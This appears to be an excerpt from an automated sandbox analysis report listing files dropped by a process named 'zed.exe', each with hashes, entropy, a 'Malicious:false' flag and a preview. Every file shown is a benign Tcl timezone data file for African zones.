                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Algiers) {.. {-9223372036854775808 732 0 LMT}.. {-2486592732 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1531443600 0 0 WET}.. {-956365200 3600 1 WEST}.. {-950486400 0 0 WET}.. {-942012000 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796262400 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766630800 3600 0 CET}.. {-733280400 0 0 WET}.. {-439430400 3600 0 CET}.. {-212029200 0 0 WET}.. {41468400 3600 1 WEST}.. {54774000 0 0 WET}.. {231724800 3600 1 WEST}.. {246240000 3600 0 CET}.. {259545600 7200 1 CEST}.. {275274000 3600 0 CET}.. {309740400 0 0 WET}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.801054282631739
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjEUEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DGs+DR
                                                                                                                                                                                                                                            MD5:A543BDEB3771017421FB75231F0004F2
                                                                                                                                                                                                                                            SHA1:D682C58C27562FF3ABAB8EDE8EB6EA754DA7C02E
                                                                                                                                                                                                                                            SHA-256:064EB7F9A1FA05A317C6BDCA6B102BC1560D980758F9E4DDB010C9E7DC068ECB
                                                                                                                                                                                                                                            SHA-512:44848D60EDC79AF784A819714C0D9F62DCCB6329B47F25D74AB8C174BF9EC3F783C66FEB27F588A93FABA9BECAF076F453D6D797CE4F28461F7AE69440EA54C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmara) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.806258322241929
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjAWDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2D8DkOn
                                                                                                                                                                                                                                            MD5:1B5E386E7A2F10D9385DE4C5683EBB85
                                                                                                                                                                                                                                            SHA1:FECBA599C37493D2E0AEE8E21BAB40BF8E8DC82A
                                                                                                                                                                                                                                            SHA-256:76939852A98EA7BF156D0AC18B434CC610DAF5232322C0FBB066CD52C5B72AF7
                                                                                                                                                                                                                                            SHA-512:B36FABFCDB2187A3A4A211C8E033D96C91E3C4D47907D284E10786555562C82231566033EAB4753EF1E48DF1233CFC8C6C0FB3CA50748BE0B2554A972A88FBA0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmera) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.883634030944169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcxAQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwNDBS
                                                                                                                                                                                                                                            MD5:6B9BB5B37C41AA727E31BF03483DC1CA
                                                                                                                                                                                                                                            SHA1:CB3BBA37B063EA4A54CD15C6E30C14D8CA30D3C0
                                                                                                                                                                                                                                            SHA-256:F6D1BA22115A6565B6D6ABEB578F001DDB41E673C422C8EA70D0DF77B24115F6
                                                                                                                                                                                                                                            SHA-512:23DB3E298FDEB165FD85D99E03C00835B584984B814AF7F54A9CDD4A9F93E16B0C58342D319129F46CF8EC36F93DE5EA51B492CA4CABDAB75D84709BC6C26119
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Bamako) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.882974805254803
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcx2m/2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dw/2D4yn
                                                                                                                                                                                                                                            MD5:92FF9E5835C0C80F358BFE69120660A0
                                                                                                                                                                                                                                            SHA1:724758B43BD79DD8A29B02BE6910D492924F8280
                                                                                                                                                                                                                                            SHA-256:5047A507D22B68C9349EB6A48C41C80DB4C69F98F99C6574059DEA87178E36C0
                                                                                                                                                                                                                                            SHA-512:6FCB709DB4AC19191FECE1E8BAC55E77F265B5AF89F7A3565F06BFAF0BEE12E3EAF2F52CA09C68D75C358C25A31867505CE8AD75D7386DCD15F4BE1CE61272CD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Bangui) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.888193386512119
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcx79FHp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dw7J4c
                                                                                                                                                                                                                                            MD5:46E5703CF284E44E15E5872DF075FCBC
                                                                                                                                                                                                                                            SHA1:EA4BFA6D568DFA877F72302ADA21ECC2840D9FD5
                                                                                                                                                                                                                                            SHA-256:77E610A02CCECE3045B09D07A9BE6100F5AA9C3C2AEB543535C9AE941194F4E4
                                                                                                                                                                                                                                            SHA-512:1454467FE63E97DFA4DE66E359F68B2D80C92CDE59FC15A4BE513629FFD154D2281EADF3FC78F7AFDDF5A5896195F3A69E66697A659BBB1A0EAFD3E1DA6565EC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Banjul) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.847843768169462
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2Dc5iDMXGm2OHGVkeoHsdSawwF6hSVPVFwy:SlSWB9eg/2D4uDm2OHCkeoH1awwFMmMy
                                                                                                                                                                                                                                            MD5:7E710C939B9CC0C1AC1ECF4239B543C5
                                                                                                                                                                                                                                            SHA1:429CC87086FB22727815ED05AC6472333FF06013
                                                                                                                                                                                                                                            SHA-256:2A870E534DE67713C27F2F3B9BF26FA7498C240CF633988CE76DBDAC5B69214D
                                                                                                                                                                                                                                            SHA-512:70D9365C31C43A95211FC20E9290B24D356FFEFA935B8829CE32831026A196DECDD12226097F6DA3B4B919E137AA0181714680CDBB72B00C130A87E3A4735004
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Bissau) {.. {-9223372036854775808 -3740 0 LMT}.. {-1830380400 -3600 0 -01}.. {157770000 0 0 GMT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.904342145830274
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc8ycXp75h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAmp1hs
                                                                                                                                                                                                                                            MD5:7AD3749D7047855CB9B9EC9696015402
                                                                                                                                                                                                                                            SHA1:F792359AD9EEC2ABD98DAFA6661C1E57BAB89EBE
                                                                                                                                                                                                                                            SHA-256:8F700409B8EEE33ACE5F050414971FFEE0270949842E58E9299BB5CD6CCF34DE
                                                                                                                                                                                                                                            SHA-512:681C1B318746C587DEBA6E109D1D5A99D1F3E28FE46C24F36B69D533D884FDDC6EA35BB31A475575D683B73BF129FED761523EC9285F2FF1E4CACA2C54C046C5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Blantyre) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.901235831565769
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DciE0TMJZp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D4qGp4D1
                                                                                                                                                                                                                                            MD5:7028268EE88250AC40547A3FDBBFC67C
                                                                                                                                                                                                                                            SHA1:5006D499CD1D1CB93EB3DA0EC279F76B7123DAA6
                                                                                                                                                                                                                                            SHA-256:596DB2D64CDD6250642CB65514D5BCB52F3E3EA83F50D8915D9D4FDEA008F440
                                                                                                                                                                                                                                            SHA-512:D623C69FE8A6050E77FB819C2F5FAEE35D5034182B1D30A409C17208155501656133E774E402875537335F8201E4734A0B5D327712CBF623AC330F1014D9025B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Brazzaville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.947752840781864
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DclbDcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkbDEi
                                                                                                                                                                                                                                            MD5:0EBC2D8F0BD1A32C21070F9397EAC9E2
                                                                                                                                                                                                                                            SHA1:95AAA97427265635784E8AC624CA863DB9F1475D
                                                                                                                                                                                                                                            SHA-256:9A15867255B43A954CA60DA11660F157553AAB6A15C50ACD49D182276E0CF4CC
                                                                                                                                                                                                                                            SHA-512:4CD2E14F84C58E955742637A51D99DB9493972671A2B5D801EBD9D901D4903654E374C59BF010C70071D33FA17788358F78004201A787CCA2AD714D670393488
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Bujumbura) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3852
                                                                                                                                                                                                                                            Entropy (8bit):3.7766651198444507
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:58ybRwEa40MF4pt0/jaGYbaJF0a3T07ITB85oWXmSGmuyTVuV0apRQnL0KD3rZza:fLg1GbJFp3gHRQVy7DPUUQkiHMo
                                                                                                                                                                                                                                            MD5:9DCDB3DD41DA13D81EB8E1CAF56964DA
                                                                                                                                                                                                                                            SHA1:F95EE7B1EF464F2640EC4AE29F3C18B5BF2B2905
                                                                                                                                                                                                                                            SHA-256:8698B0A53D858AEA7C495EDF759EF0E6C63F7E07A256599393DEC7B7A7413734
                                                                                                                                                                                                                                            SHA-512:BA5898ABEE541BC72C9DEDD77BABB18024C7AEA0274FA3F809748FCBFF770BFAD902BF70680DDE989F7D3592E5398C100D0E0EA388D4200911ED7DE089535D6D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Cairo) {.. {-9223372036854775808 7509 0 LMT}.. {-2185409109 7200 0 EET}.. {-929844000 10800 1 EEST}.. {-923108400 7200 0 EET}.. {-906170400 10800 1 EEST}.. {-892868400 7200 0 EET}.. {-875844000 10800 1 EEST}.. {-857790000 7200 0 EET}.. {-844308000 10800 1 EEST}.. {-825822000 7200 0 EET}.. {-812685600 10800 1 EEST}.. {-794199600 7200 0 EET}.. {-779853600 10800 1 EEST}.. {-762663600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-165801600 7200 0 EET}.. {-147402000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5532
                                                                                                                                                                                                                                            Entropy (8bit):3.535398586134154
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:zE+CJZtmaG6/eszBrlxs5MRhk9xPmwv7KbGKCDp0d:7MZSszBrlKcJC9k
                                                                                                                                                                                                                                            MD5:18183122D242E0B69A80BC02BC0328DF
                                                                                                                                                                                                                                            SHA1:C9976ABC0663EB29A2FEAAFDF6746C05A264B67C
                                                                                                                                                                                                                                            SHA-256:8776EEDFDFEE09C4C833593127CEFAC9C33E2487AB9BF4BF8C73E5E11B4E5613
                                                                                                                                                                                                                                            SHA-512:9611A6EF9C5B55FAB752C1EC7E464B8AF60AE32383CE9BA72F35168ABB68A45DB0654A9099CBDC123F5F6E2B6DB7C8FBF56A8DDB813824187AD1090971F12219
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Casablanca) {.. {-9223372036854775808 -1820 0 LMT}.. {-1773012580 0 0 +00}.. {-956361600 3600 1 +00}.. {-950490000 0 0 +00}.. {-942019200 3600 1 +00}.. {-761187600 0 0 +00}.. {-617241600 3600 1 +00}.. {-605149200 0 0 +00}.. {-81432000 3600 1 +00}.. {-71110800 0 0 +00}.. {141264000 3600 1 +00}.. {147222000 0 0 +00}.. {199756800 3600 1 +00}.. {207702000 0 0 +00}.. {231292800 3600 1 +00}.. {244249200 0 0 +00}.. {265507200 3600 1 +00}.. {271033200 0 0 +00}.. {448243200 3600 0 +01}.. {504918000 0 0 +00}.. {1212278400 3600 1 +00}.. {1220223600 0 0 +00}.. {1243814400 3600 1 +00}.. {1250809200 0 0 +00}.. {1272758400 3600 1 +00}.. {1281222000 0 0 +00}.. {1301788800 3600 1 +00}.. {1312066800 0 0 +00}.. {1335664800 3600 1 +00}.. {1342749600 0 0 +00}.. {1345428000 3600 1 +00}.. {1348970400 0 0 +00}.. {1367114400 3600 1 +00}.. {13731
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7536
                                                                                                                                                                                                                                            Entropy (8bit):3.8315604186920704
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:TzLdXKy9f4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:TdayR41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:30155093248C4F7E45EF7C0132D2B2AB
                                                                                                                                                                                                                                            SHA1:FAD100CC49F0CB0910BDE39B43295A47512E1BE6
                                                                                                                                                                                                                                            SHA-256:8827F7311EDE69A9679BDF2B7418DBF350A2FC8F973E8B1E1E4390D4D5C6D2E8
                                                                                                                                                                                                                                            SHA-512:469A24AF0C2A4A40CB2488C3E21BB9BBDE057F876EACA08A31FC6F22845063D917A0A4AE96680401E45792DE534EE3A305F137A93C4DF879B4602510D881270E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ceuta) {.. {-9223372036854775808 -1276 0 LMT}.. {-2177452800 0 0 WET}.. {-1630112400 3600 1 WEST}.. {-1616810400 0 0 WET}.. {-1451692800 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1427673600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364774400 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333324800 0 0 WET}.. {-1316390400 3600 1 WEST}.. {-1301270400 0 0 WET}.. {-1293840000 0 0 WET}.. {-94694400 0 0 WET}.. {-81432000 3600 1 WEST}.. {-71110800 0 0 WET}.. {141264000 3600 1 WEST}.. {147222000 0 0 WET}.. {199756800 3600 1 WEST}.. {207702000 0 0 WET}.. {231292800 3600 1 WEST}.. {244249200 0 0 WET}.. {265507200 3600 1 WEST}.. {271033200 0 0 WET}.. {448243200 3600 0 CET}.. {504918000 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.88110192592456
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcmMM1+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DCM1+c
                                                                                                                                                                                                                                            MD5:8CDD2EEB7E0EC816F3EC051350FEBF13
                                                                                                                                                                                                                                            SHA1:37F3A149B4A01DFA2EAB42A28C810BE66AAB7C52
                                                                                                                                                                                                                                            SHA-256:3176C99FC45337CBCE0CD516DE4B02B8BAA47D00E84F698122A2ADD57797984E
                                                                                                                                                                                                                                            SHA-512:5A90B6DB45EDAD7734D596FB81FD1959A433F57E71D2212E1DCBD6A12F3FD1FE747FA363C4C787A4D3023F542553C1E2C9CF4F61E28F1BB13042E4AFE3D0FF31
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Conakry) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.856992353568779
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXXMFBx/2DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DKXEBn
                                                                                                                                                                                                                                            MD5:946D3B52F915445DBB8EE8BF67F4EFAB
                                                                                                                                                                                                                                            SHA1:18345968B95E886CA72634D49F2B38F9B29BA629
                                                                                                                                                                                                                                            SHA-256:D50F9732757B284BAC75526F2CFA585DF7F6974160827AFB0FF66124C7CFD361
                                                                                                                                                                                                                                            SHA-512:00B531D1352CF35045EE25C777C7FEA17294E9861E68CE2DE0D9884C05EBDEA84D5F4F0E8B5605721295E25C259979446B7DB76525A633C7D2FA35B38962CF43
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Dakar) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                                                            Entropy (8bit):4.8447607449193075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2Dc8bEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DJbVDR
                                                                                                                                                                                                                                            MD5:7A819572758BC60F4085DF28F1DD1C01
                                                                                                                                                                                                                                            SHA1:0A5BA34EBFBA5A8E8B896713BA527781FC90FF01
                                                                                                                                                                                                                                            SHA-256:AB69948637416219A3D458777990FA4568BEBC89388884BBF129C0E1370A560B
                                                                                                                                                                                                                                            SHA-512:C03E785D1E85292056BB0BDD8DF8326C5DFEB6070AB1C071E1032D14EA69C9DEBC57B2CC7852E35D31652187126CCF0009A6A5C32F9DBB75D56C705535DF05CC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Dar_es_Salaam) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.829357904445218
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcRHKQ1BQDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DOrkDR
                                                                                                                                                                                                                                            MD5:7981499F9430DC1636C9F834273E0B91
                                                                                                                                                                                                                                            SHA1:1D63F8578420D56E4A5D9D0881FBEC015421E416
                                                                                                                                                                                                                                            SHA-256:E7F7560CCD65D53C446ADAE7128A74D37E17DD0B907A2F2FD85322FB8707B497
                                                                                                                                                                                                                                            SHA-512:3C3F7D78E9A0DE6E2950E1C305EA2DBC986754AE9FB10AC410685F30C39EC235F6F221393099C012E62EE5A7B4F1BED67C96B7B81E90BBA064BA9FE685FE4050
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Djibouti) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.850101792457859
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcnKe2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dml2D4yn
                                                                                                                                                                                                                                            MD5:44881E75AC32FA95FF6143066EF01B90
                                                                                                                                                                                                                                            SHA1:A221619B4CDE8BE6A181E1F3869EAB665F2E98B8
                                                                                                                                                                                                                                            SHA-256:FCF2DAD148F4D2951320EA99730C56D5EB43D505F37416BE4BAD265CE2902706
                                                                                                                                                                                                                                            SHA-512:4FA67A5F84758366189F0FC4A7FA6C820BA083E1C56EA95D25D21A367F25F76261B7EB5631DFFEB20E095CFD64E770338773F76BD50D4CF6AE29AD3EDFCEC408
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Douala) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5235
                                                                                                                                                                                                                                            Entropy (8bit):3.541189246992611
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:+eCJZtmaG6/eszBrlxs5MRhk9xPmwv7KbGKCDp0d:+eqZSszBrlKcJC9k
                                                                                                                                                                                                                                            MD5:956F5B51FA8BA2E954A0E59AAC8F3276
                                                                                                                                                                                                                                            SHA1:AE35A8502E57EA6EE173E3B42509E4CAC73DA091
                                                                                                                                                                                                                                            SHA-256:5FB102A95B3C004AAB8371840B1A04AC352F48FF9E9EAFDEAAF21960B0F3CAA6
                                                                                                                                                                                                                                            SHA-512:19E7F2574E2B62DF68CC24737F6B94864B3D64B2472BC7D78E6AB5142A1DC1AB3B3700AB802129CB16AED4A4FED29E2B8A5593EE327ADF496255FE2FEF6A7023
                                                                                                                                                                                                                                            Malicious:false
